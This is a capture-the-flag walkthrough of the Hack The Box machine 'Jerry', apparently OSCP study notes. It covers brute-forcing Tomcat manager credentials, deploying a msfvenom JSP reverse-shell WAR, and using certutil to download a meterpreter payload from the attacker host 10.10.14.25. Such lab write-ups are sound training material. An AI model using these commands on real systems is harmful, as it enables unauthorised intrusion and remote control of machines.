> For the complete documentation index, see [llms.txt](https://aditya-3.gitbook.io/oscp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://aditya-3.gitbook.io/oscp/readme/walkthroughs/hack-the-box/jerry-htb.md).

# Jerry HTB

## Enumeration

* we use nmap for enumeration:![](/files/hleL0MwMACLI414GG4FU)
* we found a default webpage (apache tomcat):![](/files/GCyyRmDQTtL2cUMZjMwg)

## Exploitation

* Using burpsuite we find that the password is base64 encoded:!\[\[2024-01-30\_17-04.png]
* We can use decoder to decode bas64 and we find that it is in a username:password format![](/files/t8VIHrzlr9SQAfXMNrC2)
* To do brute forcing we need to convert to Base64:![](/files/wIfzhT39CNXJlw6Iw02t)
* To do this for all passwords we need a bash command `for cred in $(cat tomcat_passwds.txt); do echo -n $cred | base64 ; done` ' where tomcat\_passwds.txt has all default passwords
* Use burpsuite to bruteforce: ![](/files/zZSfLyt5iMb5JWBjRD7s)![](/files/LzSd3HWvKyNK8dRhzkZX)
* We found 2 matches: ![](/files/d4Cuu7IZedtr016UgxMy)
* These are the passwords required:![](/files/2N9uwopSUVy1bM3V9O8g)
* We create a msfvenom payload with `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f war > reverse.war` then deploy using the previously found credentials.![](/files/dz49rziscdrErMhLhpkT)
* listening on netcat using `nc -nlvp 4444` we get an root shell:![](/files/nxOnFHYkJIc7n2G3nrKP)

### Metasploit

* use `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > meterpreter.exe` for creating the payload
* listen using exploit/multi/handler
* To upload the payload host a http server with `python -m SimpleHTTPServer 80` then use `certutil -urlcache -f http://10.10.14.25/Downloads/Jerry/meterpreter.exe c:\users\administrator\desktop\flags\meterpreter.exe` in the shell and execute the meterpreter.exe file.
* Then we get a meterpreter shell \`
